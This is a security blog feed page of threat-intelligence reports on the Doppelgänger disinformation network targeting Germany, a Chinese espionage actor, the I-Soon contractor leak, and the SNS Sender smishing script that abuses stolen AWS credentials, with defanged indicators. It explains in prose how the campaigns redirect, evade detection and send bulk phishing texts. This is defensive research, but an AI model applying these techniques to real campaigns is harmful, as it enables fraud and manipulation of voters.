Normal view

There are new articles available, click to refresh the page.
Before yesterdaySentinelLabs

Doppelgänger | Russia-Aligned Influence Operation Targets Germany 

22 February 2024 at 13:55

Executive Summary

  • SentinelLabs and ClearSky Cyber Security have been tracking the activities of a suspected Russia-aligned influence operation network named Doppelgänger.
  • We observed Doppelgänger intensively targeting German audiences, coinciding with recent reports from the German Ministry of Foreign Affairs and Der Spiegel.
  • The network spreads propaganda and disinformation through news articles focused on current socio-economic and geopolitical topics relevant to the general population.
  • Doppelgänger disseminates content criticizing the ruling government coalition and its support for Ukraine, likely aiming to influence public opinion before the upcoming elections in Germany.
  • Doppelgänger leverages a substantial network of X accounts, actively participating in coordinated activities to enhance visibility and engage audiences.

Overview

SentinelLabs and ClearSky Cyber Security have been tracking a propaganda and disinformation campaign since late November 2023, highly likely orchestrated by Doppelgänger, a suspected Russia-aligned influence operation network known for its persistent and aggressive tactics. Initially focusing on disseminating anti-Ukraine content following the onset of the Russo-Ukrainian conflict, Doppelgänger has since broadened its scope, targeting audiences in the US, Israel, Germany, and France.

We observed a significant emphasis by Doppelgänger on targeting German audiences. The network’s activities are characterized by consistent efforts to disseminate propaganda and disinformation content, particularly by exploiting current topics of geopolitical and socio-economic significance among the population. The majority of the content seizes every opportunity to criticize the ruling government coalition and its support for Ukraine.

With Doppelgänger activities intensifying in times of frequent political shifts in Germany, we suspect that the network’s goal is to erode support for the coalition in light of upcoming European Parliament, municipal, and federal state elections, culminating in federal government elections scheduled for 2025.

While we were documenting the Doppelgänger campaign, the German Ministry of Foreign Affairs and the prominent German media outlet Der Spiegel reported on overlapping activities, highlighting a growing concern about election interference.

In this post, we supplement existing reporting by providing additional technical indicators and insights into Doppelgänger’s tactics and disseminated content, with the ultimate goal of further heightening public awareness of this threat.

This report focuses on Doppelgänger activities targeting German audiences; a complementary report by Clearsky Cyber Security delves into the network’s targeting of Israel, the United States, and Ukraine. The activities we observed closely resemble and partially overlap with those previously reported by Recorded Future and Meta, indicating the persistent nature of Doppelgänger.

We observed Doppelgänger orchestrating the operation of a large coordinated network of X (formerly known as Twitter) accounts. These accounts propagate content from third-party websites whose content aligns with Doppelgänger propaganda goals, as well as from sites that Doppelgänger itself has created.

The majority of the X accounts we discovered as part of our investigation had not been deactivated at the time of writing. In an effort to maximize visibility and audience engagement, these accounts participate in coordinated activities, such as regularly posting and reposting content from highly popular profiles, as well as engaging with posts from other suspected Doppelgänger-managed accounts.

The posts from these accounts contain links that redirect visitors through two stages to the destination articles intended for consumption. These stages implement obfuscation and tracking techniques. Coupled with the carefully constructed infrastructure management practices we observed Doppelgänger implementing, this underscores the network’s determination to operate without interruptions while effectively tracking the performance of its influence operations.

Redirection Stages

The first-stage websites, which Doppelgänger distributes on X, use thumbnail images hosted at telegra[.]ph to obfuscate the website thumbnails and redirect to second-stage sites.

First-stage website
First-stage website

The second-stage websites contain text unrelated to the campaign and execute a JavaScript code obfuscated using Base64-encoding.

Second-stage website
Second-stage website

The JavaScript code samples we analyzed issue a request to ggspace[.]space (reported as part of previous Doppelgaenger campaigns) or sdgqaef[.]site. The request includes tracking information, which is likely a campaign identifier. These are in the format of [country]-[day]-[month]_[domain], where [domain] refers to the domain hosting the destination article (DE-02-01_deintelligenz for an article hosted at deintelligenz[.]com). The IOC table at the end of this post lists some of the campaign identifiers we observed.

Second-stage website: Deobfuscated JavaScript code
Second-stage website: Deobfuscated JavaScript code

In addition, the JavaScript code executed by second-stage websites dynamically loads another JavaScript code provided by ggspace[.]space or sdgqaef[.]site, which implements logic for generating web content that redirects to a destination article.

JavaScript code from sdgqaef[.]site

JavaScript code from sdgqaef[.]site
JavaScript code from sdgqaef[.]site

sdgqaef[.]site and ggspace[.]space host at the /admin URL path a login page, which has been assessed to be of the Keitaro Tracking System. Doppelgaenger possibly uses Keitaro to track the effectiveness of its campaigns.

Login page hosted at sdgqaef[.]site
Login page hosted at sdgqaef[.]site

Social Media Activities

Probably in an attempt to increase their visibility, some of the suspected Doppelgänger-managed X accounts we identified regularly post content, which does not necessarily contain first-stage websites, whereas others remain idle for relatively long time periods.


An active and idle suspected Doppelgänger account
An active and idle suspected Doppelgänger account

We observed accounts posting content linking to first-stage sites in multiple languages of the targeted audiences. Further, the Doppelgänger’s account network is probably attempting to increase the engagement metrics of posts that link to first-stage websites in a targeted manner through reposts and views. This becomes evident when these metrics are compared with the metrics of posts by the same accounts that do not link to first-stage websites.

Multi-language posts tailored to the targeted audiences
Multi-language posts tailored to the targeted audiences
Engagement metric discrepancies
Engagement metric discrepancies

We identified multiple clusters of suspected Doppelgänger-managed accounts which have joined the X platform within the same month. We observed a significant level of coordination in the activities of the accounts within the same cluster, suggesting centralized control. This includes reposting of the same content at almost the same time, typically that of highly popular profiles. In addition, engagement metrics of posts that link to first-stage sites by suspected Doppelgänger accounts within the same cluster often have very similar engagement metrics.


Coordinated activities
Coordinated activities

Engagement metric similarities
Engagement metric similarities

Our analysis of the engagement metrics for almost all the accounts we identified revealed a range of reposts between 700 and 2000, with a median value of 883, and a range of views between 613 and 14000, with a median value of 5000.

Propaganda and Disinformation Content

Doppelgänger has been very active in creating websites that host articles for consumption by targeted audiences through the previously described multi-stage approach. Among these sites, there are domains and websites impersonating third-party news outlets, which includes mimicking their design, structure, and domain names, such as welt[.]pm (inauthentic) vs. welt[.]de (authentic) and faz[.]ltd (inauthentic) vs. faz[.]net (authentic). We assess that the rest of the websites we observed have been created by Doppelgänger with original design and structure and no indications of impersonating established news platforms.

In most cases, we observed consistent and regular publishing of new content, with only occasional idle periods lasting a few days at most. Some of the content consists of a blend of materials sourced from other websites and translated into the languages of the targeted audiences.

A closer look at the custom-built websites indicates that Doppelgänger has been making a fast-paced effort to bring its websites online and start distributing content. For example, some sites include template text or exhibit errors in search functionalities. Furthermore, nearly all of these websites lack social media presence. They display icons of social media platforms that link to the domains of these platforms rather than specific profiles.

Template text (emphasis added)
Template text (emphasis added)

Many of the custom-built websites have been built and are managed using the WordPress content management system. We observed that some websites display status messages in Russian when users perform content searches and the activity fails with an error, indicating the use of Russian-language WordPress components.

Wordpress status message translates to “Search for”
WordPress status message translates to “Search for”

The majority of the articles Doppelgänger distributes have a strong anti-government narrative, especially in regard to the government’s support of Ukraine. The article snippets we present below are machine-translated from German into English.

An article at arbeitspause[.]org discusses a recent series of strikes by workers in the German public transport demanding better wages and better working conditions. The challenges relating to the state of workers in this sector, such as rising living costs due to inflation and shortage of workers, are a pressing concern in Germany that captures the attention of the broader population.

Article snippet from <i>arbeitspause[.]org</i>, referencing Scholz, the German chancellor (emphasis added)
Article snippet from arbeitspause[.]org, referencing Scholz, the German chancellor (emphasis added)

On a similar note, another article at arbeitspause[.]org focuses on the recent strikes by German farmers, which involved the blockade of major roads and were motivated by rising living costs and the government’s plan to phase out agricultural subsidies. Overlapping at times with the strikes in the public transport sectors, the farmers’ strikes have been disrupting mobility and therefore garnered the attention of the population and mass media. Doppelgänger has attempted to capitalize on the momentum by criticizing the government’s plan regarding agricultural subsidies, drawing a connection to the government’s support for Ukraine.

Article snippet from arbeitspause[.]org
Article snippet from arbeitspause[.]org

An article at derglaube[.]com focuses on the German immigration policy, which, according to some polls, ranks among the top issues for voters in Germany. In addition, the media frequently covers topics relating to the government’s allocation of funds for immigration-related programs and services. Consistent with typical Doppelgänger practices, the influence operation network uses this opportunity to cast the government in a negative light and introduce its support for Ukraine into the narrative.

Article snippet from derglaube[.]com (original emphasis)
Article snippet from derglaube[.]com (original emphasis)
Article snippet from derglaube[.]com (emphasis added)
Article snippet from derglaube[.]com (emphasis added)

In an attempt to blend political-oriented propaganda or disinformation among other topics, some websites host articles covering broader subjects such as health, sports, and culture. We observed attempts to introduce propaganda even in such articles. For example, an article hosted at miastagebuch[.]com initially discusses headaches from a medical perspective only to later indicate the German government as one of the major causes of headaches.

Anti-government statements in a health-themed article (emphasis added)
Anti-government statements in a health-themed article (emphasis added)

We emphasize that Doppelgänger also targets Germany through articles published by third-party outlets, such as telepolis[.]de, freiewelt[.]net, overton-magazin[.]de, and deutschlandkurier[.]de.

The articles from these outlets that Doppelgänger disseminates focus on both domestic and international topics, some with a strong anti-Western narrative. For instance, an article from overton-magazin[.]de portrays the West as profiteering from the Russo-Ukrainian conflict, while depicting Ukraine as a plaything of Western global players (cit.).

Article snippet from overton-magazin[.]de (emphasis added)
Article snippet from overton-magazin[.]de (emphasis added)

Additionally, an article from osthessen-news[.]de highlights factors such as the Ukraine war and inflation as contributors to economic challenges in Germany, prompting medium-sized companies to consider restructuring due to escalating costs. Issues concerning small- and mid-sized companies are particularly relevant to the broader German audience, given their significant contribution to the country’s overall economy.

Article snippet from osthessen-news[.]de
Article snippet from osthessen-news[.]de

Infrastructure

The Doppelgänger infrastructure can be structured into four parts subject to different infrastructure management and control practices, with each part designated to hosting the different entities involved in disseminating content for consumption by targeted audiences: the first-stage and second-stage redirection websites, the servers likely used for monitoring campaign performance (ggspace[.]space and sdgqaef[.]site), and the destination websites.

The first-stage and second-stage websites often shift between a variety of hosting providers, such as Hostinger, Global Internet Solutions, and Digital Ocean. The domains of these websites typically have short lifespans, lasting only several days at a time and recurring multiple times over a few years. We observe that Doppelgänger activates the domains for brief periods during its campaigns before deactivating them again.

The domains of the first-stage websites have a diverse range of top-level domains (TLDs), including generic TLDs such as .buzz, .art, .store, .site, and .online, as well as country code TLDs like .co.uk and .br. The domains’ format suggests an automated generation approach involving the creation of subdomains and numerical suffixes, for example, pcrrjx.kredit-money-fun169[.]buzz and yzrhhk.kredit-money-fun202[.]buzz.

This strategy, combined with the frequent rotation between hosting providers and the cyclical nature of the domains, indicates an effort by Doppelgänger to evade detection and tracking of its first-stage infrastructure, which is exposed on social media platforms and therefore more likely to be subjected to scrutiny. Doppelgänger does not apply the same domain naming convention to second-stage websites, which are not directly exposed on social media platforms.

Playing a central role in Doppelgänger’s campaigns, ggspace[.]space and sdgqaef[.]site are responsible for both redirection and presumably monitoring campaign performance. They are hosted behind a Cloud-based reverse proxy infrastructure, likely implemented as a security measure to obfuscate their true hosting locations. In contrast to the first-stage and second-stage domains, the active periods of these domains typically span several months during Doppelgänger’s campaigns.

Many of the servers hosting the destination websites are managed using cPanel, and some implement geofencing, which restricts traffic to IP addresses from targeted countries. This practice is likely intended to minimize exposure of their infrastructure and content to scrutiny and monitoring by researchers or authorities outside those regions, reducing the likelihood of detection and investigation into Doppelgänger’s activities.

The domains of the majority of these websites were first registered in the first quarter of 2023 and some as early as mid-2022, remaining active as of the time of writing. A smaller subset of domains, such as derglaube[.]com, which we assess with high confidence as being managed by Doppelgänger at this time, have been active for nearly 10 years, with intermittent periods of inactivity lasting a few years at most.

Conclusions

Doppelgänger represents an active instrument of information warfare, characterized by strategic use of propaganda and disinformation to influence public opinion. The campaign targeting Germany we discussed in this post serves as a compelling example of the persistent and continually evolving nature of Russia-aligned influence operations, which exploit social media and current topics of geopolitical and socio-economic significance to shape perceptions.

We anticipate that Doppelgänger’s activities, targeting not only Germany but also other Western countries, will persist and evolve, particularly in light of the major elections scheduled across the EU and the USA in the coming years. We expect Doppelgänger to continue innovating its infrastructure and obfuscation tactics to make its activities more difficult to detect and disrupt.

We emphasize that countering influence operations requires a comprehensive and collaborative approach, involving enhancing public awareness and media literacy to identify and resist manipulation, alongside prompt and effective actions by social media platforms and infrastructure operators to limit the spread of propaganda and disinformation online.

SentinelLabs continues to monitor Doppelgänger activities and remains committed to timely reporting on its operations to improve public awareness of this threat and mitigate its impact.

Indicators of Compromise

Due to the extensive volume of observed indicators, we present here only a selection, including indicators from parallel campaigns targeting France alongside those targeting German audiences.

Domains

Value Note
09474w.reyt-cre-ad34[.]buzz First-stage website
1wifsq.c-majac-ann4[.]buzz First-stage website
3wk8wa.kariz-good-ad10[.]buzz First-stage website
62ogyy[.]internetbusinesslondon[.]co[.]uk First-stage website
6fmb3r[.]great-cred195[.]buzz First-stage website
allons-y[.]social Doppelgänger-managed destination website
antiwar[.]com Third-party website whose articles Doppelgänger disseminates
arbeitspause[.]org Doppelgänger-managed destination website
arizztar[.]com Second-stage website
bfmtv[.]com Third-party website whose articles Doppelgänger disseminates
bluetoffee-books[.]com Second-stage website
brennendefrage[.]com Doppelgänger-managed destination website
buegym.ranking-kariz108[.]buzz First-stage website
contre-attaque[.]net Third-party website whose articles Doppelgänger disseminates
d6egyr.borafazerfestaoficial[.]online First-stage website
deintelligenz[.]com Doppelgänger-managed destination website
derbayerischelowe[.]info Doppelgänger-managed destination website
derglaube[.]com Doppelgänger-managed destination website
derrattenfanger[.]net Doppelgänger-managed destination website
deutschlandkurier[.]de Third-party website whose articles Doppelgänger disseminates
faridmehdipour[.]com Second-stage website
faz[.]ltd Doppelgänger-managed destination website
freeebooktemplates[.]com Second-stage website
freiewelt[.]net Third-party website whose articles Doppelgänger disseminates
ggspace[.]space Server likely used for monitoring campaign performance
grunehummel[.]com Doppelgänger-managed destination website
histoireetsociete[.]com Third-party website whose articles Doppelgänger disseminates
hungarianconservative[.]com Third-party website whose articles Doppelgänger disseminates
jungefreiheit[.]de Third-party website whose articles Doppelgänger disseminates
kaputteampel[.]com Doppelgänger-managed destination website
ledialogue[.]fr Third-party website whose articles Doppelgänger disseminates
legrandsoir[.]info Third-party website whose articles Doppelgänger disseminates
leparisien[.]re Doppelgänger-managed destination website
lildoxi[.]com Second-stage website
miastagebuch[.]com Doppelgänger-managed destination website
mt-secure-bnk[.]com Second-stage website
nice-credits-list266[.]buzz First-stage website
nw3m7o.samaritana.com[.]br First-stage website
o21obd.reyt-credbest-mx29[.]buzz First-stage website
osthessen-news[.]de Third-party website whose articles Doppelgänger disseminates
overton-magazin[.]de Third-party website whose articles Doppelgänger disseminates
pcrrjx.kredit-money-fun169[.]buzz First-stage website
profesionalvirtual[.]com Second-stage website
realpeoplesreviews[.]com Second-stage website
referendud[.]com Second-stage website
restuapp[.]com Second-stage website
sbl63p.kredit-money-fun274[.]buzz First-stage website
sdgqaef[.]site Server likely used for monitoring campaign performance
sueddeutsche[.]ltd Doppelgänger-managed destination website
telepolis[.]de Third-party website whose articles Doppelgänger disseminates
uncut-news[.]ch Third-party website whose articles Doppelgänger disseminates
v5yoaq.chilling[.]lol First-stage website
voltairenet[.]org Third-party website whose articles Doppelgänger disseminates
wanderfalke[.]net Doppelgänger-managed destination website
welt[.]pm Doppelgänger-managed destination website
www.nachdenkseiten[.]de Third-party website whose articles Doppelgänger disseminates
yzrhhk.kredit-money-fun202[.]buzz First-stage website

Campaign Identifiers

DE-02-01_deintelligenz
DE-09-01_derrattenfanger
DE-13-01_nachdenkseiten_-2
DE-13-01_telepolis_-2
DE-15-11_deutschlandkurier
DE-17-11_jungefreiheit
DE-21-11_freiewelt
DE-23-12-2_arbeitspause
DE-23-12-2_arbeitspause
DE-24-11_grunehummel
DE-25-01_brennendefrage
DE-25-01_derglaube
DE-25-01_welt
DE-27-12_faz
DE-27-12_miastagebuch_-2
DE-27-12_sueddeutsche
DE-29-01_derbayerischelowe
FR-03-02_candidat
FR-03-02_lexomnium_-2
FR-04-02_allons-y
FR-13-01_original
FR-19-01_bfmtv_s
FR-23-12-2_franceeteu
FR-23-12-2_leparisien
FR-25-01_la-sante
FR-26-12_hungarianconservative
FR-26-12_lepoint_-2
FR-26-12_voltairenet
FR-27-12_ledialogue
FR-27-12_lesfrontieres

Suspected Doppelgänger-managed X/Twitter Accounts

AyniyeMcca18343
Brent8332812692
ButzlaffF6068
chareaterc59681
Chris423806
Dan2082135
elasagev1981744
Equinoxevt4
Eric69112331297
Eric81026324555
izaguine65954
jacksanbac66126
Jermaine1384705
Jermaine1384705
Jim388251815042
Joseph673224507
Joseph673224507
Kevin1135109
Kristin1039811
Marc182057
Marc1826509
Mark5768674550
MeadowOf43589
MehetabelW87922
MGlasscock91268
Mike3614071710
MingoGerri92116
MissyVoorh3954
MitchamNis5726
MKarg84246
ModestiaH56404
ModestineF72279
MonteroTer52325
MontesRodi62373
moore_tess5916
MorelockSo28285
MorganMcqu33699
MunroHelen78796
MurdockTip96177
myrta53009
NancyOrona49857
NannySpeer51042
NatalaWelb47593
Natasha90680770
NaylorVida41053
NCraighead92692
NFridley71438
Nikki9265841534
NikoliaE39574
NJean52219
NKuehner28951
OClodfelte8787
of_navy23563
of_novelis81275
OlguinElsy987
Oliver1325592
Omar37785134192
Pam807954589169
PauliHarry9140
PegeenD80598
Pete1192428369
Rayshaw78069964
Rounak1685212
Tim298432442090

LABScon Replay | Chasing Shadows | The Rise of a Prolific Espionage Actor

By: LABScon
20 February 2024 at 21:12

In an engaging exploration at LABSCon, Kris McConkey unveils the evolution and significance of a cyber espionage actor, dubbed as a “superpower” in the digital espionage arena. This actor, initially engaged in phishing campaigns, has matured into one of the most technically sophisticated and deeply entrenched entities in cyber espionage.

Evolution

Tracing back over a decade, public and private intelligence reports have consistently highlighted the actor’s growing sophistication. From early stages marked by widespread malware distribution, such as PlugX and ShadowPad, to a more controlled dissemination of advanced tools like Crosswalk and Sidewalk, the actor has demonstrated a strategic tightening of their operational framework.

Technical Sophistication

The actor’s technical prowess is evident through the use of ShadowPad, a tool first emerged around 2015, with SentinelOne offering a comprehensive analysis on its evolution. Notably, ShadowPad has been adopted by at least 13 distinct threat actors, showcasing its wide influence. Introducing ScatterBee loader in 2020 marked a significant technical leap, showcasing advanced obfuscation techniques that complicate malware analysis efforts.

Operational Tactics

The presentation delves into the operational intricacies of the espionage actor, including their unique approach to malware loading and execution. A notable shift was observed in August 2022, with the discovery of a new ShadowPad variant that employed a novel execution mechanism, further emphasizing the actor’s ongoing innovation and adaptation.

Global Reach and Sector Focus

The actor’s operational scope is global, impacting over 35 countries across various sectors. This widespread engagement underscores the actor’s strategic intent and capability to infiltrate various targets, from governmental bodies to the telecommunications sector. Their focus extends to high-value targets, leveraging tailored malware like FunnySwitch and Spider for specific operations.

Infrastructure and Techniques

An in-depth analysis of the actor’s infrastructure reveals a multi-layered approach, involving relay networks and virtual private servers to obfuscate their activities. This infrastructure supports various capabilities, from direct victim access to sophisticated tunneling techniques, enabling the actor to maintain a persistent threat landscape.

Insights Based on Numbers

  • The actor has evolved over ten years, highlighting their long-term presence and impact.ShadowPad has been utilized by 13 distinct threat actors, indicating its widespread adoption.
  • The espionage network has targeted over 35 countries, demonstrating its global reach.

In conclusion, the rise of this espionage actor from modest beginnings to becoming a formidable force in cyber espionage illustrates a significant shift in the cyber threat landscape. Their ability to innovate, adapt, and execute sophisticated cyber operations underscores the need for advanced defensive strategies and international cooperation to counteract their pervasive influence.

Watch the full presentation:

About the Presenter

Kris leads PwC’s Global Cyber Threat Intelligence practice, which tracks a wide variety of targeted threat actors operating from more than 25 countries.

Kris also leads the EMEA Cyber Threat Operations practice – a front line technical services group responsible for a portfolio of defensive and offensive cyber security services to help clients detect and respond to cyber security threats and incidents. He has spent the past 17 years at PwC delivering cyber incident response, threat hunting and threat research services to global clients.

About LABScon 2023

This presentation was featured live at LABScon, an immersive 3-day conference bringing together the world’s top cybersecurity minds, hosted by SentinelOne’s research arm, SentinelLabs.

Unmasking I-Soon | The Leak That Revealed China’s Cyber Operations

Executive Summary

  • I-Soon (上海安洵), a company that contracts for many PRC agencies–including the Ministry of Public Security, Ministry of State Security, and People’s Liberation Army–was subject to a data leak over the weekend of Feb 16th. It is not known who pilfered the information nor their motives, but this leak provides a first-of-its-kind look at the internal operations of a state-affiliated hacking contractor. The authenticity of the documents is still undecided. While the leak’s contents do confirm public threat intelligence, efforts to corroborate further the documents are on-going.
  • The leak provides some of the most concrete details seen publicly to date, revealing the maturing nature of China’s cyber espionage ecosystem. It shows explicitly how government targeting requirements drive a competitive marketplace of independent contractor hackers-for-hire.
  • I-Soon–whose employees complain about low pay and gamble over mahjong in the office–appears to be responsible for the compromise of at least 14 governments, pro-democracy organizations in Hong Kong, universities, and NATO. The leaked documents align with previous threat intel on several named threat groups.
  • Victim data and targeting lists, as well as names of the clients who requested them, show a company who competes for low-value hacking contracts from many government agencies. The finding indicates that historical targeting information from Advanced Persistent Threats thought to be PRC contractors does not provide strong guidance on future targets.
  • Machine translation enabled the rapid consumption of leaked data. These tools broadened the initial analysis of the information beyond seasoned China experts with specialized language skills and technical knowledge. This has enabled many more analysts to scan the leaked information and quickly extract and socialize findings. As researchers dig into the voluminous information, domain expertise will be required to understand the complex relationships and implicit patterns between the relevant organizations, companies, and individuals. One upshot is that geographically-specialized analysis will continue to provide distinct value, but the barrier to entry is much lower.

Initial Observations

  1. At 10:19 pm on January 15th, someone, somewhere, registered the email address [email protected]. One month later, on February 16th, an account registered by that email began uploading content to GitHub. Among the files uploaded were dozens of marketing documents, images and screenshots, and thousands of WeChat messages between employees and clients of I-SOON. An analyst based in Taiwan found the document trove on GitHub and shared their findings on social media.
  2. Many of the files are versions of marketing materials intended to advertise  the company and its services to potential customers. In a bid to get work in Xinjiang–where China subjects millions of Ugyhurs to what the UN Human Rights Council has called genocide–the company bragged about past counterterrorism work. The company listed other terrorism-related targets the company had hacked previously as evidence of their ability to perform these tasks, including targeting counterterrorism centers in Pakistan and Afghanistan. 
  3. Elsewhere, technical documents demonstrated to potential buyers how the company’s products function to compromise and exploit targets. Listed in the documentation were pictures of custom hardware snooping devices, including a tool meant to look like a powerbank that actually passed data from the victim’s network back to the hackers. Other documentation diagrammed some of the inner workings of I-SOON’s offensive toolkit. While none were surprising or outlandish capabilities, they confirmed that the company’s main source of revenue is hacking for hire and offensive capabilities.
  4. The leaked documents provide indicators–such as command-and-control infrastructure, malware, and victimology–which relate to suspected Chinese cyberespionage activities previously observed by the threat intelligence community. Initial observations point to activities spanning a variety of targeted industry sectors and organizations as well as APT groups and intrusion sets, which the threat intelligence community tracks, or has been tracking, as distinct clusters. The extent and strength of the relationships between indicators present in the leaked data and past intrusions are still subject to detailed evaluation.
  5. The selection of documents and chats leaked on GitHub seem meant to embarrass the company, but they also raise key questions for the cybersecurity community. One document lists out targeted organizations and the fees the company earned by hacking them. Collecting data from Vietnam’s Ministry of Economy paid out $55,000, other ministries were worth less. Another leaked messaging exchange shows an employee hacking into a university not on the targeting list, only for their supervisor to brush it off as an accident. Employees complained about low pay and hoped to get jobs at other companies, such as Qi An Xin.

Conclusion

The leaked documents offer the threat intelligence community a unique opportunity to reevaluate past attribution efforts and gain a deeper understanding of the complex Chinese threat landscape. This evaluation is essential for keeping up with a complex threat landscape and improving defense strategies.

Extensive sharing of malware and infrastructure management processes between groups makes high-confidence clustering difficult. As demonstrated by the leaked documents, third-party contractors play a significant role in facilitating and executing many of China’s offensive operations in the cyber domain.

For defenders and business leaders, the lesson is plain and uncomfortable. Your organization’s threat model likely includes underpaid technical experts making a fraction of the value they may pilfer from your organization. This should be a wakeup call and a call to action.

SNS Sender | Active Campaigns Unleash Messaging Spam Through the Cloud

15 February 2024 at 13:55

Executive Summary

  • SNS Sender is a script that enables bulk SMS spamming using AWS SNS, aka Smishing, a previously unseen technique in the context of cloud attack tools.
  • The script author is currently known by the alias ARDUINO_DAS and is prolific in the phish kit scene.
  • The script requires valid AWS SNS credentials compromised from an environment not subject to the SNS sandbox restrictions.
  • We identified links between this actor and numerous phishing kits used to target victims’ personally identifiable information (PII) and payment card details.
  • The smishing scams often take the guise of a message from the United States Postal Service (USPS) regarding a missed package delivery.

Overview

A common thread between businesses and threat actors is that both are moving workloads previously handled by traditional web servers to the cloud. SentinelLabs has identified one example of this in the form of SNS Sender, a Python script that uses AWS Simple Notification Service (SNS) to send bulk SMS messages for the purpose of spamming phishing links, aka Smishing.

SNS Sender is the first script we encountered using AWS SNS to send spam texts. The script requires access to an AWS account in which the service was already provisioned, configured, and enabled. By default, AWS accounts are subject to restrictions through a feature called the SNS sandbox. These restrictions can be removed if the customer spends $1 and provides a viable use case to AWS support, who manually review such requests. While other tools like AlienFox have used business to customer (B2C) communications platforms such as Twilio to conduct SMS spamming attacks, we are unaware of existing research that details tools abusing AWS SNS to conduct such attacks.

We identified links between the actor behind this tool and many phishing kits used to target victims’ personally identifiable information (PII) and payment card details under the guise of a message from the United States Postal Service (USPS) regarding a missed package delivery. We believe this actor is using cloud services to send bulk SMS phishing messages, though they may still be testing the tool based on some questionable programming choices.

Script Analysis

SNS Sender is a script that enables bulk SMS spamming using AWS SNS. The script requires a list of phishing links named links.txt in its working directory. SNS Sender also takes several arguments that are entered as input:

  • A text file containing a list of AWS access keys, secrets, and region delimited by a colon
  • A text file containing a list of phone numbers to target
  • A sender ID, similar to a display name for a message
  • The message content
SNS Sender inputs and outputs
SNS Sender inputs and outputs

The send_sns_message function sets up the AWS boto3 client–an interface between the Python script and the AWS SNS backend–to send the SMS messages. The boto3 client variables are obtained through the arguments that the script user provided.

The sender ID variable is an interesting inclusion. According to AWS documentation, this variable is optional and is supported in some countries. In the United States, carriers do not support sender IDs, whereas in India, they are mandatory. The inclusion of a sender ID contrasts with the actor’s association with USPS-themed phishing kits targeting Americans. The oversight may indicate the actor is not familiar with this exception and likely resides in a country where the sender ID is commonplace.

SNS Sender establishes a while loop that iterates through the list of AWS credentials and regions. The script replaces any occurrences of the string linkas in the message content variable with a URL from the links.txt file, which weaponizes the message as a phishing SMS. The link is selected randomly using the Python random library’s choice method.

The script tracks how many AWS access key pairs have been accessed through the a variable and how many phone numbers have been used through the y variable, which are initialized as 0 and incremented by 1 each time the loop runs. Each message is sent using the credentials from one line from the AWS access key pair list, and the tracking ensures that the next line is accessed for the subsequent message.

To run at scale, the list would need to be incredibly long, and likely repeat access key & secret pairs, making this a coding method with questionable efficacy.

Phishing Kits

When investigating the handle ARDUINO_DAS, we identified more than 150 phishing kit files containing references to the actor. More than half of the kits are USPS-themed. The assets in these archives are similar in name to the URIs present in several recent Smishing campaigns using a missed package delivery lure. We believe that the actor abandoned the ARDUINO_DAS handle in 2023 after accusations that the actor scammed buyers. However, some recently circulated phishing kits still reference this handle, which may make it an artifact of actors using the phishing kit.

Due to the link between ARDUINO_DAS and USPS phishing, we explored several active campaigns circulating through early January 2024, hosted on hxxps://usps[.]mytrackingh[.]top and hxxps://u-sipsl[.]cc. Both sites host a USPS-themed phishing site with a flow like:

  1. Landing Page: Explains to the visitor that their USPS package is unable to be delivered. The “Click Update” button leads to the next step.
  2. Tracking Page: This page looks like USPS tracking details, but it prompts the victim to enter their name, physical address, phone number, and email address.
  3. Card Verification Page: This page prompts the user to enter a credit card number for a $0.30 redelivery fee.
  4. The server forwards the details to a card checker, which is likely run through a Telegram service.
Landing page for phishing flow
Landing page for phishing flow
PII theft form
PII theft form
Credit card theft form
Credit card theft form

Conclusion

Actors are continuously finding new tools and platforms they can use to conduct their attack of choice, and SNS Sender is no exception. Spammers have used mega tools like AlienFox and Predator to target bulk mail services as well as business communications services. Other researchers have detailed which APIs have been used during in-the-wild AWS SNS abuse attacks, as well as enumeration routes actors may take to verify a targeted environment’s SNS capabilities. SNS Sender provides a glimpse into how actors conduct these attacks.

SNS Sender represents a more narrow approach that relies on the actor having access to a properly configured AWS SNS tenant. Using AWS presents a challenge for this actor: AWS does not allow SMS notifications via SNS by default. For this feature to work, the tenant needs to be removed from the SNS sandbox environment. This is an update from previous research where AWS automatically allowed accounts to send to 10 destination numbers while an account is in the SNS sandbox.

Organizations using AWS SNS can protect themselves by reviewing the SNS documentation for the latest information. AWS has shared guidance for organizations to learn more about the SNS sandbox and how to change sending limits. Identity and Access Management (IAM) administrators should review identity best practices to optimize their organization’s security posture.

Desire for recognition presents operational security challenges for actors developing tools for the opportunistic cloud hacking scene. The actor including their handle in the script is ubiquitous among cloud hack tools, enabling researchers to form a point of attribution even when delineating the tool families becomes challenging due to extensive overlap.

Indicators of Compromise

8fd501d7af71afee3e692a6880284616522d709e – sns_sender.py, SNS Sender

Phishing URLs

hxxps[:]//perwebsolutions[.]com/js/
hxxps[:]//usps[.]mytrackingh[.]top
hxxps[:]//u-sipsl[.]cc

Phish Kit Archives

01b82c779de9ef59ecd814d6131433f7b17d7eb0
03329461d8003aece83db2c124b5c2769dd0300e
03b0cc3f1576d0d719f5ac5dbba582a9c10e64e0
040e07a1c4cbc7eb9fb2a8ecfb865c0a2f4db5b9
04676e36b9e11f32fd675e96dd721a5a215a0641
0544db064ecb8fd8f36e96ef31d031447011c711
0547074a7cb42a67a933d70c302b626f4e10a86e
09ddd1b6f3dc1323ad86d458da05f5be605c8e7a
0a8ab120e03ed49e18ce3246b9d00f547fd9432c
0bb8a3a478d1143a04fb8abd8aa9c116282cc700
0eaa126cf4414684763b415aabc08e262ee7c194
0fb6fa2855a39f7010d3a1bcc0c08e739747785c
1024d7c1a10e94d0f926cff649a9bd9a0c5df6ba
103a49c6c4f71ab5bbcaa01df89aef80e0c90229
106b42a1a6401f6ff3cb38f66d0668ac22fbc59c
10fe02acfa1053210387bc312f1ff9529eaeba35
138a00f5e6ef81560cdfe25f2ab087c24e839efd
14ea8aa63539498773bb0d4bea5fbede05f1c17d
17a2515096e6afe5976f57887c89d3efe285ed06
1a97f72dedbdf13b13baa4c535398af25a78a28e
1b1940f128bb4f3420ebc4b5ab1a7b165e70003b
1d0a54f030e8b68bbf1256811fbb4a284ce31fda
1e85b4cf222387cddc0f2977d5c9f4a5eb03db06
1fa655639ee1f7d9c8e3157346f65d351d4b3450
1fb3a8a17123f82bf39ae93ede40273f155d5fa1
1fe0823655c30cabf51816ed1048f647172d29c8
20813f948849a05f84ed1b6a707ffc6965d17c1e
25dd30bda5bbfa7af884c0d3a71857b6abcb8222
27b6aaa536200b085d611af07b0c05df8a856eb8
29a4771a04afce2b789fe34b42a12d2fa65073ab
29d49c1d21c9e97c757db81db594e55b15587f98
2ac1467e567bc6e950b8aee96d898b71f9cf5849
2c62c5f3e4166be99bf985a0c5f08cfe5795221d
2d4f45cdfe0793431e0134376b309f1707a4e2e6
